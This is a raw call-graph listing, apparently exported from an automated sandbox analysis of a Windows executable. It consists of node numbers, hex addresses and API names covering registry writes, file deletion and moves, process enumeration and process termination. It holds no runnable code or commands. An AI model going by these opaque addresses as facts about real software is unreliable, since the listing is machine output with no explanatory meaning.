94633 5a2fec 94626->94633 94636 5a2f94 94628->94636 94629 5a30e0 9 API calls 94630 5a2b76 94629->94630 94630->94626 94631 5a2bac 94630->94631 94631->94632 94656 5a2bc8 __fread_nolock 94631->94656 95002 603ef6 81 API calls __wsopen_s 94632->95002 94635 59b3fe 8 API calls 94633->94635 94637 5a2ff9 94635->94637 94998 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94636->94998 94999 5ae662 254 API calls 94637->94999 94639 5e7bb9 95003 603ef6 81 API calls __wsopen_s 94639->95003 94642 5a2cef 94643 5e7c1c 94642->94643 94644 5a2cfc 94642->94644 95005 6160a2 53 API calls _wcslen 94643->95005 94646 5a30e0 9 API calls 94644->94646 94648 5a2d09 94646->94648 94647 5b016b 8 API calls 94647->94656 94651 5e7d45 94648->94651 94652 5a30e0 9 API calls 94648->94652 94649 5a3032 95000 5afe59 8 API calls 94649->95000 94650 5b019b 8 API calls 94650->94656 94660 5e7bb4 94651->94660 95006 603ef6 81 API calls __wsopen_s 94651->95006 94658 5a2d23 94652->94658 94655 5a02f0 254 API calls 94655->94656 94656->94637 94656->94639 94656->94642 94656->94647 94656->94650 94656->94655 94657 5e7bfd 94656->94657 94656->94660 95004 603ef6 81 API calls __wsopen_s 94657->95004 94658->94651 94661 59be6d 8 API calls 94658->94661 94663 5a2d87 ISource 94658->94663 94660->94615 94661->94663 94662 5a30e0 9 API calls 94662->94663 94663->94649 94663->94651 94663->94660 94663->94662 94665 5a2e3b ISource 94663->94665 94671 597953 FindCloseChangeNotification 94663->94671 94701 61cd16 94663->94701 94790 6095f6 94663->94790 94805 605ed5 94663->94805 94835 606561 94663->94835 94842 608e39 94663->94842 94861 60874a 94663->94861 94888 606d2d 94663->94888 94901 60de5d 94663->94901 94906 619eea 94663->94906 94909 5fe9c5 GetFileAttributesW 94663->94909 94911 61ac49 94663->94911 94916 6065b4 94663->94916 94921 5abe75 94663->94921 94978 5af95e 94663->94978 94985 604ad5 94663->94985 94990 61a4b4 94663->94990 94664 5a2edd 94664->94615 94665->94664 94996 5ae29c 8 API calls ISource 94665->94996 94671->94663 94684->94615 94685->94615 94686->94609 94687->94614 94688->94609 94689->94609 94690->94609 94692 5a30fd 94691->94692 94693 5a3121 94691->94693 94700 5a2b60 94692->94700 95009 5b05d2 5 API calls __Init_thread_wait 94692->95009 95007 5b05d2 5 API calls __Init_thread_wait 94693->95007 94695 5a312b 94695->94692 95008 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94695->95008 94697 5a9ec7 94697->94700 95010 5b0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94697->95010 94700->94629 94702 59bf07 8 API calls 94701->94702 94703 61cd39 94702->94703 94704 59bf07 8 API calls 94703->94704 94705 61cd42 94704->94705 94706 59bf07 8 API calls 94705->94706 94707 61cd4b 94706->94707 94718 61cdda 94707->94718 95011 598e70 94707->95011 94711 61cda5 95060 61d2f7 94711->95060 94713 61cdd6 94714 61ce76 RegCreateKeyExW 94713->94714 94715 61ce0f RegConnectRegistryW 94713->94715 94713->94718 94717 61cf0e 94714->94717 94725 61cead 94714->94725 94715->94714 94715->94718 94719 61d1d6 RegCloseKey 94717->94719 94721 598e70 52 API calls 94717->94721 94718->94663 94719->94718 94720 61d1e9 RegCloseKey 94719->94720 94720->94718 94722 61cf29 94721->94722 94723 5b4db8 _strftime 40 API calls 94722->94723 94724 61cf38 94723->94724 94726 61cf44 94724->94726 94727 61cf96 94724->94727 94725->94718 94729 61ceff RegCloseKey 94725->94729 94728 598e70 52 API calls 94726->94728 94730 598e70 52 API calls 94727->94730 94731 61cf4e _wcslen 94728->94731 94729->94718 94732 61cfa0 94730->94732 94737 598e70 52 API calls 94731->94737 94733 5b4db8 _strftime 40 API calls 94732->94733 94734 61cfaf 94733->94734 94735 61d047 94734->94735 94736 61cfbf 94734->94736 94738 598e70 52 API calls 94735->94738 94739 598e70 52 API calls 94736->94739 94740 61cf70 94737->94740 94741 61d051 94738->94741 94742 61cfc9 _wcslen 94739->94742 94743 598e70 52 API calls 94740->94743 94744 5b4db8 _strftime 40 API calls 94741->94744 94749 598e70 52 API calls 94742->94749 94789 61cf85 94743->94789 94745 61d060 94744->94745 94747 61d070 94745->94747 94748 61d156 94745->94748 94746 61d2bb RegSetValueExW 94746->94719 94768 61d01f 94746->94768 94750 598e70 52 API calls 94747->94750 94752 598e70 52 API calls 94748->94752 94751 61cfeb 94749->94751 94753 61d07a 94750->94753 94754 598e70 52 API calls 94751->94754 94755 61d160 94752->94755 94757 5b019b 8 API calls 94753->94757 94758 61d000 RegSetValueExW 94754->94758 94756 5b4db8 _strftime 40 API calls 94755->94756 94759 61d16f 94756->94759 94760 61d09f 94757->94760 94758->94719 94758->94768 94761 61d215 94759->94761 94762 61d17f 94759->94762 94763 598e70 52 API calls 94760->94763 94765 598e70 52 API calls 94761->94765 95070 59c92d 94762->95070 94777 61d0b4 94763->94777 94767 61d21f 94765->94767 94766 61d187 94769 598e70 52 API calls 94766->94769 94770 5b4db8 _strftime 40 API calls 94767->94770 94768->94719 94771 61d198 RegSetValueExW 94769->94771 94772 61d22e 94770->94772 94771->94719 94771->94768 94775 61d265 94772->94775 94776 61d23a 94772->94776 94773 598e70 52 API calls 94779 61d106 RegSetValueExW 94773->94779 94778 598e70 52 API calls 94775->94778 95075 59c5df 39 API calls 94776->95075 94777->94773 94781 61d26f 94778->94781 94779->94768 94783 5b4db8 _strftime 40 API calls 94781->94783 94782 61d242 94784 598e70 52 API calls 94782->94784 94785 61d27e 94783->94785 94784->94771 94785->94768 95076 60276a 10 API calls 94785->95076 94787 61d296 94788 598e70 52 API calls 94787->94788 94788->94789 94789->94746 94791 59bf07 8 API calls 94790->94791 94792 609607 94791->94792 94793 598e70 52 API calls 94792->94793 94794 609616 94793->94794 94795 59557e 9 API calls 94794->94795 94796 609621 94795->94796 94797 598e70 52 API calls 94796->94797 94798 60962e 94797->94798 94799 598e70 52 API calls 94798->94799 94800 609640 94799->94800 94801 598e70 52 API calls 94800->94801 94802 609655 WritePrivateProfileStringW 94801->94802 94803 60966b WritePrivateProfileStringW 94802->94803 94804 609677 94802->94804 94803->94804 94804->94663 94806 605ef4 94805->94806 94834 605fbd 94805->94834 94807 59c92d 39 API calls 94806->94807 94808 605eff 94807->94808 94810 59c92d 39 API calls 94808->94810 94809 598e70 52 API calls 94811 605fef 94809->94811 94812 605f15 94810->94812 94813 598e70 52 API calls 94811->94813 94816 59bf07 8 API calls 94812->94816 94812->94834 94814 606001 94813->94814 95082 5fd836 94814->95082 94818 605f26 94816->94818 94817 606011 94817->94663 94819 59bf07 8 API calls 94818->94819 94820 605f2f 94819->94820 94821 598e70 52 API calls 94820->94821 94822 605f3c 94821->94822 94823 59694e 8 API calls 94822->94823 94824 605f4f 94823->94824 94825 597af4 8 API calls 94824->94825 94826 605f60 94825->94826 94827 605f89 94826->94827 95125 5fdc8e 94826->95125 94829 59c92d 39 API calls 94827->94829 94829->94834 94831 59b25f 8 API calls 94832 605f80 94831->94832 95128 5fda81 94832->95128 94834->94809 94834->94817 94836 598e70 52 API calls 94835->94836 94837 606577 94836->94837 95212 5fdb69 94837->95212 94839 60657f 94840 606583 GetLastError 94839->94840 94841 606598 94839->94841 94840->94841 94841->94663 94843 59bf07 8 API calls 94842->94843 94844 608e4a 94843->94844 94845 5b019b 8 API calls 94844->94845 94846 608e54 94845->94846 94847 5941a6 8 API calls 94846->94847 94848 608e5e 94847->94848 94849 598e70 52 API calls 94848->94849 94850 608e6d 94849->94850 94851 59557e 9 API calls 94850->94851 94852 608e78 94851->94852 94853 598e70 52 API calls 94852->94853 94854 608e85 94853->94854 94855 598e70 52 API calls 94854->94855 94856 608e97 94855->94856 94857 598e70 52 API calls 94856->94857 94858 608eac GetPrivateProfileStringW 94857->94858 95237 596ab6 94858->95237 94860 608ecf ISource 94860->94663 94862 60875a __wsopen_s 94861->94862 94863 598e70 52 API calls 94862->94863 94864 60877b 94863->94864 94865 59c92d 39 API calls 94864->94865 94866 608799 94864->94866 94865->94866 94867 598e70 52 API calls 94866->94867 94880 608973 94866->94880 94868 60887c 94867->94868 94869 59557e 9 API calls 94868->94869 94870 6088a7 94869->94870 95251 5bd913 94870->95251 94872 6088cd 94873 6088f7 GetCurrentDirectoryW SetCurrentDirectoryW 94872->94873 94874 608921 94873->94874 94873->94880 94875 5fe387 4 API calls 94874->94875 94876 60892a 94875->94876 94877 5fe9c5 GetFileAttributesW 94876->94877 94876->94880 94878 608938 94877->94878 94879 608940 GetFileAttributesW SetFileAttributesW 94878->94879 94886 6089cb 94878->94886 94881 6089b1 94879->94881 94882 608969 SetCurrentDirectoryW 94879->94882 94880->94663 94883 608a02 SetCurrentDirectoryW 94881->94883 94884 6089b5 SetCurrentDirectoryW 94881->94884 94882->94880 94883->94880 94884->94886 95254 609f9f FindFirstFileW 94886->95254 94887 6089ea 94887->94883 94889 598e70 52 API calls 94888->94889 94890 606d47 94889->94890 94891 606d84 94890->94891 94892 59c92d 39 API calls 94890->94892 95298 5fe783 94891->95298 94894 606d76 94892->94894 94894->94891 94896 59557e 9 API calls 94894->94896 94896->94891 94897 606d92 95303 597a59 8 API calls 94897->95303 94899 598e70 52 API calls 94899->94897 94900 606dd7 94900->94663 94902 59b3fe 8 API calls 94901->94902 94903 60de70 94902->94903 95304 60183b 94903->95304 94905 60de78 94905->94663 95329 6188b6 94906->95329 94908 619efa 94908->94663 94910 5fe9d1 94909->94910 94910->94663 94912 598e70 52 API calls 94911->94912 94913 61ac65 94912->94913 95436 5fdc9c CreateToolhelp32Snapshot Process32FirstW 94913->95436 94915 61ac74 94915->94663 94917 598e70 52 API calls 94916->94917 94918 6065c7 94917->94918 94919 5fe387 4 API calls 94918->94919 94920 6065d1 94919->94920 94920->94663 94922 596ab6 8 API calls 94921->94922 94923 5abe8d 94922->94923 94924 5b016b 8 API calls 94923->94924 94928 5e8f7a 94923->94928 94926 5abea6 94924->94926 94927 5b019b 8 API calls 94926->94927 94929 5abeb7 94927->94929 94969 5abf1f 94928->94969 95473 60a607 39 API calls 94928->95473 94930 597953 FindCloseChangeNotification 94929->94930 94932 5abec2 94930->94932 94931 59c92d 39 API calls 94933 5e8fdc 94931->94933 94934 59bf07 8 API calls 94932->94934 94935 5abf2c 94933->94935 94936 5e8fe4 94933->94936 94937 5abeca 94934->94937 94939 5afdc9 3 API calls 94935->94939 94940 59c92d 39 API calls 94936->94940 94938 597953 FindCloseChangeNotification 94937->94938 94941 5abed1 94938->94941 94945 5abf33 94939->94945 94940->94945 94942 598e70 52 API calls 94941->94942 94943 5abedd 94942->94943 94944 597953 FindCloseChangeNotification 94943->94944 94946 5abee7 94944->94946 94947 5abf4e 94945->94947 94948 5e8ff9 94945->94948 94949 596e52 5 API calls 94946->94949 94950 597a14 8 API calls 94947->94950 94951 5b019b 8 API calls 94948->94951 94952 5abef8 94949->94952 94953 5abf56 94950->94953 94954 5e8ffe 94951->94954 94955 5abf00 94952->94955 94956 5e8f72 94952->94956 95454 5abfbc 94953->95454 94958 5e9012 94954->94958 94962 5941c9 2 API calls 94954->94962 94963 596b12 13 API calls 94955->94963 95472 597923 FindCloseChangeNotification ISource 94956->95472 94968 5e9016 __fread_nolock 94958->94968 95474 601759 8 API calls ___scrt_fastfail 94958->95474 94961 5abf65 94961->94968 95469 597a59 8 API calls 94961->95469 94962->94958 94965 5abf0e 94963->94965 95468 596afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 94965->95468 94967 5abf79 94970 5abfb3 94967->94970 94973 597953 FindCloseChangeNotification 94967->94973 94969->94931 94969->94935 94970->94663 94971 5e8f3b 95471 5fd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 94971->95471 94972 5abf15 94972->94969 94972->94971 94974 5abfa7 94973->94974 94974->94970 95470 597923 FindCloseChangeNotification ISource 94974->95470 94976 5e8f52 94976->94969 94979 59c92d 39 API calls 94978->94979 94980 5af972 94979->94980 94981 5af97a timeGetTime 94980->94981 94982 5efac0 Sleep 94980->94982 94983 59c92d 39 API calls 94981->94983 94984 5af990 94983->94984 94984->94663 94986 598e70 52 API calls 94985->94986 94987 604ae8 94986->94987 94988 5fda81 12 API calls 94987->94988 94989 604af0 94988->94989 94989->94663 94991 61a4c7 94990->94991 94992 598e70 52 API calls 94991->94992 94995 61a4d6 94991->94995 94993 61a534 94992->94993 95498 6017be 94993->95498 94995->94663 94996->94665 94997->94623 94998->94626 94999->94649 95000->94649 95001->94625 95002->94660 95003->94660 95004->94660 95005->94658 95006->94660 95007->94695 95008->94692 95009->94697 95010->94700 95012 598e85 95011->95012 95028 598e82 95011->95028 95013 598ebb 95012->95013 95014 598e8d 95012->95014 95016 5d6b10 95013->95016 95019 598ecd 95013->95019 95024 5d6a29 95013->95024 95077 5b5556 26 API calls 95014->95077 95080 5b5513 26 API calls 95016->95080 95017 598e9d 95023 5b016b 8 API calls 95017->95023 95078 5afe8f 51 API calls 95019->95078 95020 5d6b28 95020->95020 95025 598ea7 95023->95025 95027 5b019b 8 API calls 95024->95027 95033 5d6aa2 95024->95033 95026 59b25f 8 API calls 95025->95026 95026->95028 95029 5d6a72 95027->95029 95034 61d6b1 95028->95034 95030 5b016b 8 API calls 95029->95030 95031 5d6a99 95030->95031 95032 59b25f 8 API calls 95031->95032 95032->95033 95079 5afe8f 51 API calls 95033->95079 95035 59bceb 8 API calls 95034->95035 95036 61d6bf 95035->95036 95037 59bceb 8 API calls 95036->95037 95038 61d6c7 95037->95038 95039 59bceb 8 API calls 95038->95039 95040 61d6cf 95039->95040 95041 61d737 95040->95041 95042 59627c 8 API calls 95040->95042 95043 59bceb 8 API calls 95041->95043 95044 61d6e5 95042->95044 95047 61d735 95043->95047 95044->95041 95045 59627c 8 API calls 95044->95045 95046 61d6f7 95045->95046 95046->95041 95048 61d6fc 95046->95048 95049 598685 8 API calls 95047->95049 95050 5996d9 8 API calls 95048->95050 95051 61d760 95049->95051 95055 61d707 95050->95055 95052 598685 8 API calls 95051->95052 95053 61d777 95052->95053 95054 5979ed 8 API calls 95053->95054 95056 61d780 95054->95056 95057 598685 8 API calls 95055->95057 95056->94711 95058 61d728 95057->95058 95059 5996d9 8 API calls 95058->95059 95059->95047 95061 59c269 8 API calls 95060->95061 95062 61d30e CharUpperBuffW 95061->95062 95063 61d329 95062->95063 95064 59bf07 8 API calls 95063->95064 95065 61d334 95064->95065 95066 598685 8 API calls 95065->95066 95067 61d347 _wcslen 95066->95067 95068 61d3a4 _wcslen 95067->95068 95069 5979ed 8 API calls 95067->95069 95068->94713 95069->95068 95071 59c93e 95070->95071 95072 59c945 95070->95072 95071->95072 95081 5b6661 39 API calls _strftime 95071->95081 95072->94766 95074 59c988 95074->94766 95075->94782 95076->94787 95077->95017 95078->95017 95079->95016 95080->95020 95081->95074 95083 59bf07 8 API calls 95082->95083 95084 5fd853 95083->95084 95085 59bf07 8 API calls 95084->95085 95086 5fd85b 95085->95086 95087 59bf07 8 API calls 95086->95087 95088 5fd863 95087->95088 95089 59557e 9 API calls 95088->95089 95090 5fd86d 95089->95090 95091 59557e 9 API calls 95090->95091 95092 5fd877 95091->95092 95140 5fe958 95092->95140 95094 5fd882 95095 5fe9c5 GetFileAttributesW 95094->95095 95096 5fd88d 95095->95096 95097 5fd89f 95096->95097 95098 5965a4 8 API calls 95096->95098 95099 5fe9c5 GetFileAttributesW 95097->95099 95098->95097 95100 5fd8a7 95099->95100 95101 5fd8b4 95100->95101 95102 5965a4 8 API calls 95100->95102 95103 59bf07 8 API calls 95101->95103 95102->95101 95104 5fd8bc 95103->95104 95105 59bf07 8 API calls 95104->95105 95106 5fd8c4 95105->95106 95107 59694e 8 API calls 95106->95107 95108 5fd8d5 FindFirstFileW 95107->95108 95109 5fda23 FindClose 95108->95109 95111 5fd8f8 95108->95111 95114 5fda21 95109->95114 95110 5fd9ef FindNextFileW 95110->95111 95111->95109 95111->95110 95112 59b25f 8 API calls 95111->95112 95115 597af4 8 API calls 95111->95115 95116 5965a4 8 API calls 95111->95116 95117 5fdc8e 4 API calls 95111->95117 95118 5fd984 95111->95118 95119 5fda12 FindClose 95111->95119 95122 5fda5c CopyFileExW 95111->95122 95124 5fd9ca DeleteFileW 95111->95124 95151 5fdf85 95111->95151 95112->95111 95114->94817 95115->95111 95116->95111 95117->95111 95120 5ae2e5 41 API calls 95118->95120 95121 5fd9ad MoveFileW 95118->95121 95123 5fd99d DeleteFileW 95118->95123 95119->95114 95120->95118 95121->95111 95122->95111 95123->95111 95124->95111 95207 5fe387 lstrlenW 95125->95207 95129 5979ed 8 API calls 95128->95129 95130 5fdab6 GetFileAttributesW 95129->95130 95131 5fdaca GetLastError 95130->95131 95134 5fdae3 95130->95134 95132 5fdad7 CreateDirectoryW 95131->95132 95133 5fdae5 95131->95133 95132->95133 95132->95134 95133->95134 95135 5996d9 8 API calls 95133->95135 95134->94827 95136 5fdb27 95135->95136 95137 5fda81 8 API calls 95136->95137 95138 5fdb30 95137->95138 95138->95134 95139 5fdb34 CreateDirectoryW 95138->95139 95139->95134 95141 59bf07 8 API calls 95140->95141 95142 5fe96d 95141->95142 95143 59bf07 8 API calls 95142->95143 95144 5fe975 95143->95144 95145 59694e 8 API calls 95144->95145 95146 5fe984 95145->95146 95147 59694e 8 API calls 95146->95147 95148 5fe994 95147->95148 95149 5ae2e5 41 API calls 95148->95149 95150 5fe9a9 95149->95150 95150->95094 95152 5fdfa1 95151->95152 95153 5fdfbc 95152->95153 95154 5fdfa6 95152->95154 95155 59bf07 8 API calls 95153->95155 95157 59be6d 8 API calls 95154->95157 95204 5fdfb7 95154->95204 95156 5fdfc4 95155->95156 95158 59bf07 8 API calls 95156->95158 95157->95204 95159 5fdfcc 95158->95159 95160 59bf07 8 API calls 95159->95160 95161 5fdfd7 95160->95161 95162 59bf07 8 API calls 95161->95162 95163 5fdfdf 95162->95163 95164 59bf07 8 API calls 95163->95164 95165 5fdfe7 95164->95165 95166 59bf07 8 API calls 95165->95166 95167 5fdfef 95166->95167 95168 59bf07 8 API calls 95167->95168 95169 5fdff7 95168->95169 95170 59bf07 8 API calls 95169->95170 95171 5fdfff 95170->95171 95172 59694e 8 API calls 95171->95172 95173 5fe016 95172->95173 95174 59694e 8 API calls 95173->95174 95175 5fe02f 95174->95175 95176 59627c 8 API calls 95175->95176 95177 5fe03b 95176->95177 95178 5fe04e 95177->95178 95179 5996d9 8 API calls 95177->95179 95180 59627c 8 API calls 95178->95180 95179->95178 95181 5fe057 95180->95181 95182 5fe067 95181->95182 95183 5996d9 8 API calls 95181->95183 95184 5fe079 95182->95184 95186 59be6d 8 API calls 95182->95186 95183->95182 95185 597af4 8 API calls 95184->95185 95187 5fe084 95185->95187 95186->95184 95205 5fe141 8 API calls 95187->95205 95189 5fe093 95206 5fe141 8 API calls 95189->95206 95191 5fe0a6 95192 59627c 8 API calls 95191->95192 95193 5fe0b0 95192->95193 95194 5fe0c7 95193->95194 95195 5fe0b5 95193->95195 95197 59627c 8 API calls 95194->95197 95196 5965a4 8 API calls 95195->95196 95198 5fe0c2 95196->95198 95199 5fe0d0 95197->95199 95202 597af4 8 API calls 95198->95202 95200 5fe0ee 95199->95200 95201 5965a4 8 API calls 95199->95201 95203 597af4 8 API calls 95200->95203 95201->95198 95202->95200 95203->95204 95204->95111 95205->95189 95206->95191 95208 5fdc95 95207->95208 95209 5fe3a5 GetFileAttributesW 95207->95209 95208->94827 95208->94831 95209->95208 95210 5fe3b1 FindFirstFileW 95209->95210 95210->95208 95211 5fe3c2 FindClose 95210->95211 95211->95208 95213 59bf07 8 API calls 95212->95213 95214 5fdb88 95213->95214 95215 59bf07 8 API calls 95214->95215 95216 5fdb91 95215->95216 95217 59bf07 8 API calls 95216->95217 95218 5fdb9a 95217->95218 95219 59557e 9 API calls 95218->95219 95220 5fdba5 95219->95220 95221 5fe9c5 GetFileAttributesW 95220->95221 95222 5fdbae 95221->95222 95223 5fdbc0 95222->95223 95224 5965a4 8 API calls 95222->95224 95225 59694e 8 API calls 95223->95225 95224->95223 95226 5fdbd4 FindFirstFileW 95225->95226 95227 5fdc60 FindClose 95226->95227 95231 5fdbf3 95226->95231 95233 5fdc6b 95227->95233 95228 5fdc3b FindNextFileW 95230 5fdc4f 95228->95230 95228->95231 95229 59be6d 8 API calls 95229->95231 95230->95231 95231->95227 95231->95228 95231->95229 95232 597af4 8 API calls 95231->95232 95234 5965a4 8 API calls 95231->95234 95232->95231 95233->94839 95235 5fdc2c DeleteFileW 95234->95235 95235->95228 95236 5fdc57 FindClose 95235->95236 95236->95233 95238 5d587b 95237->95238 95240 596ac6 95237->95240 95239 5d588c 95238->95239 95241 5984b7 8 API calls 95238->95241 95242 59bceb 8 API calls 95239->95242 95244 5b016b 8 API calls 95240->95244 95241->95239 95243 5d5896 95242->95243 95243->95243 95245 596ad9 95244->95245 95246 596ae2 95245->95246 95247 596af4 95245->95247 95249 59b25f 8 API calls 95246->95249 95248 59bf07 8 API calls 95247->95248 95250 596aea 95248->95250 95249->95250 95250->94860 95268 5bd6be 95251->95268 95255 60a03a FindClose 95254->95255 95263 609fc9 95254->95263 95256 60a0e2 95255->95256 95257 60a04b FindFirstFileW 95255->95257 95256->94887 95258 60a0d9 FindClose 95257->95258 95265 60a060 95257->95265 95258->95256 95260 60a028 FindNextFileW 95260->95255 95260->95263 95261 60a0c7 FindNextFileW 95261->95258 95261->95265 95262 609ff7 GetFileAttributesW SetFileAttributesW 95262->95263 95264 60a0eb FindClose 95262->95264 95263->95260 95263->95262 95264->95256 95265->95258 95265->95261 95266 60a0a0 SetCurrentDirectoryW 95265->95266 95267 60a0c0 SetCurrentDirectoryW 95265->95267 95266->95265 95267->95261 95269 5bd89f 95268->95269 95270 5bd6d5 95268->95270 95296 5bf669 20 API calls _abort 95269->95296 95270->95269 95274 5bd740 95270->95274 95272 5bd8af 95297 5c2b7c 26 API calls _abort 95272->95297 95275 5bd764 95274->95275 95284 5bd78b 95274->95284 95291 5c5153 26 API calls 2 library calls 95274->95291 95290 5bf669 20 API calls _abort 95275->95290 95277 5bd868 95277->95275 95278 5bd774 95277->95278 95281 5bd87b 95277->95281 95278->94872 95279 5bd820 95279->95275 95282 5bd841 95279->95282 95293 5c5153 26 API calls 2 library calls 95279->95293 95295 5c5153 26 API calls 2 library calls 95281->95295 95282->95275 95282->95278 95286 5bd857 95282->95286 95284->95275 95289 5bd7fd 95284->95289 95292 5c5153 26 API calls 2 library calls 95284->95292 95294 5c5153 26 API calls 2 library calls 95286->95294 95289->95277 95289->95279 95290->95278 95291->95284 95292->95289 95293->95282 95294->95278 95295->95278 95296->95272 95297->95278 95299 5d22f0 __wsopen_s 95298->95299 95300 5fe790 GetShortPathNameW 95299->95300 95301 5984b7 8 API calls 95300->95301 95302 5fe7b8 95301->95302 95302->94897 95302->94899 95303->94900 95305 60196b 95304->95305 95306 601852 95304->95306 95305->94905 95307 60189f 95306->95307 95308 601872 95306->95308 95310 6018b6 95306->95310 95309 5b019b 8 API calls 95307->95309 95308->95307 95312 601886 95308->95312 95316 601894 __fread_nolock 95309->95316 95313 5b019b 8 API calls 95310->95313 95322 6018d3 95310->95322 95311 6018fa 95315 5b019b 8 API calls 95311->95315 95314 5b019b 8 API calls 95312->95314 95313->95322 95314->95316 95317 601900 95315->95317 95318 5b016b 8 API calls 95316->95318 95323 5ac1f1 95317->95323 95318->95305 95322->95311 95322->95312 95322->95316 95324 5b019b 8 API calls 95323->95324 95325 5ac208 95324->95325 95326 5b016b 8 API calls 95325->95326 95327 5ac214 95326->95327 95328 5af9e2 10 API calls 95327->95328 95328->95316 95330 598e70 52 API calls 95329->95330 95331 6188ed 95330->95331 95354 618932 ISource 95331->95354 95367 619632 95331->95367 95333 618bde 95334 618dac 95333->95334 95339 618bec 95333->95339 95423 619843 59 API calls 95334->95423 95337 618dbb 95338 618dc7 95337->95338 95337->95339 95338->95354 95380 6187e3 95339->95380 95340 598e70 52 API calls 95356 6189a6 95340->95356 95345 618c25 95394 5b0000 95345->95394 95348 618c45 95422 603ef6 81 API calls __wsopen_s 95348->95422 95349 618c5f 95351 597d51 8 API calls 95349->95351 95353 618c6e 95351->95353 95352 618c50 GetCurrentProcess TerminateProcess 95352->95349 95355 5983b0 8 API calls 95353->95355 95354->94908 95357 618c87 95355->95357 95356->95333 95356->95340 95356->95354 95420 5f4a0c 8 API calls __fread_nolock 95356->95420 95421 618e7c 41 API calls _strftime 95356->95421 95358 5a1c50 8 API calls 95357->95358 95365 618caf 95357->95365 95360 618c9e 95358->95360 95359 618e22 95359->95354 95363 618e36 FreeLibrary 95359->95363 95361 6194da 74 API calls 95360->95361 95361->95365 95363->95354 95365->95359 95366 59b3fe 8 API calls 95365->95366 95398 5a1c50 95365->95398 95409 6194da 95365->95409 95366->95365 95368 59c269 8 API calls 95367->95368 95369 61964d CharLowerBuffW 95368->95369 95424 5f96e3 95369->95424 95373 59bf07 8 API calls 95374 619689 95373->95374 95375 598685 8 API calls 95374->95375 95376 61969d 95375->95376 95378 5996d9 8 API calls 95376->95378 95377 6197bd _wcslen 95377->95356 95379 6196a7 _wcslen 95378->95379 95379->95377 95431 618e7c 41 API calls _strftime 95379->95431 95381 6187fe 95380->95381 95382 618849 95380->95382 95383 5b019b 8 API calls 95381->95383 95386 6199f5 95382->95386 95384 618820 95383->95384 95384->95382 95385 5b016b 8 API calls 95384->95385 95385->95384 95387 619c0a ISource 95386->95387 95391 619a19 _strcat _wcslen ___std_exception_copy 95386->95391 95387->95345 95388 59c92d 39 API calls 95388->95391 95389 59c5df 39 API calls 95389->95391 95390 59c9fb 39 API calls 95390->95391 95391->95387 95391->95388 95391->95389 95391->95390 95392 598e70 52 API calls 95391->95392 95432 5ff7da 10 API calls _wcslen 95391->95432 95392->95391 95396 5b0015 95394->95396 95395 5b00ad ResumeThread 95397 5b007b 95395->95397 95396->95395 95396->95397 95397->95348 95397->95349 95399 5a1c62 95398->95399 95401 5a1c6b 95399->95401 95433 5ab71c 8 API calls 95399->95433 95400 5a1d20 95400->95365 95401->95400 95403 5b016b 8 API calls 95401->95403 95404 5a1d89 95403->95404 95405 5b016b 8 API calls 95404->95405 95406 5a1d92 95405->95406 95407 59b25f 8 API calls 95406->95407 95408 5a1da1 95407->95408 95408->95365 95410 6194f2 95409->95410 95414 61950e 95409->95414 95411 6195c3 95410->95411 95412 6194f9 95410->95412 95413 61951a 95410->95413 95410->95414 95435 6015b3 72 API calls ISource 95411->95435 95434 5ff3fd 10 API calls _strlen 95412->95434 95417 596ab6 8 API calls 95413->95417 95414->95365 95417->95414 95418 619503 95419 596ab6 8 API calls 95418->95419 95419->95414 95420->95356 95421->95356 95422->95352 95423->95337 95425 5f9703 _wcslen 95424->95425 95426 5f9738 95425->95426 95429 5f97f7 95425->95429 95430 5f97f2 95425->95430 95427 5ae2e5 41 API calls 95426->95427 95426->95430 95427->95426 95428 5ae2e5 41 API calls 95428->95429 95429->95428 95429->95430 95430->95373 95430->95379 95431->95377 95432->95391 95433->95401 95434->95418 95435->95414 95446 5fe723 95436->95446 95438 5fdd9b FindCloseChangeNotification 95438->94915 95439 5fdce9 Process32NextW 95439->95438 95444 5fdce2 95439->95444 95440 59bf07 8 API calls 95440->95444 95441 59b25f 8 API calls 95441->95444 95442 59694e 8 API calls 95442->95444 95443 597af4 8 API calls 95443->95444 95444->95438 95444->95439 95444->95440 95444->95441 95444->95442 95444->95443 95445 5ae2e5 41 API calls 95444->95445 95445->95444 95447 5fe72e 95446->95447 95448 5fe745 95447->95448 95451 5fe74b 95447->95451 95452 5b6742 GetStringTypeW _strftime 95447->95452 95453 5b668b 39 API calls _strftime 95448->95453 95451->95444 95452->95447 95453->95451 95455 5ac003 95454->95455 95456 5abfc7 95454->95456 95457 59bceb 8 API calls 95455->95457 95456->95455 95458 5abfd6 95456->95458 95464 5fd2ab 95457->95464 95460 5abfeb 95458->95460 95462 5abff8 95458->95462 95459 5fd2da 95459->94961 95475 5ac009 95460->95475 95461 5fd249 2 API calls 95461->95464 95482 5fd3b2 12 API calls 95462->95482 95464->95459 95464->95461 95483 59acc0 8 API calls __fread_nolock 95464->95483 95465 5abff4 95465->94961 95468->94972 95469->94967 95470->94970 95471->94976 95472->94928 95473->94928 95474->94968 95476 5ac1f1 8 API calls 95475->95476 95477 5ac021 95476->95477 95484 59adc1 95477->95484 95480 598774 10 API calls 95481 5ac03c 95480->95481 95481->95465 95482->95465 95483->95464 95490 5afeaa 95484->95490 95486 59b050 2 API calls 95489 59add2 95486->95489 95488 59ae07 95488->95480 95488->95481 95489->95486 95489->95488 95497 59b0e3 8 API calls __fread_nolock 95489->95497 95491 5afebb 95490->95491 95492 5efe13 95490->95492 95491->95489 95493 5b016b 8 API calls 95492->95493 95494 5efe1d 95493->95494 95495 5b019b 8 API calls 95494->95495 95496 5efe32 95495->95496 95497->95489 95499 6017cb 95498->95499 95500 5b016b 8 API calls 95499->95500 95501 6017d2 95500->95501 95504 5ffbca 95501->95504 95503 60180c 95503->94995 95505 59c269 8 API calls 95504->95505 95506 5ffbdd CharLowerBuffW 95505->95506 95509 5ffbf0 95506->95509 95507 59627c 8 API calls 95507->95509 95508 5ffc2e 95510 5ffc40 95508->95510 95511 59627c 8 API calls 95508->95511 95509->95507 95509->95508 95521 5ffbfa ___scrt_fastfail 95509->95521 95512 5b019b 8 API calls 95510->95512 95511->95510 95515 5ffc6e 95512->95515 95517 5ffc90 95515->95517 95537 5ffb02 8 API calls 95515->95537 95516 5ffccd 95518 5b016b 8 API calls 95516->95518 95516->95521 95522 5ffd21 95517->95522 95519 5ffce7 95518->95519 95520 5b019b 8 API calls 95519->95520 95520->95521 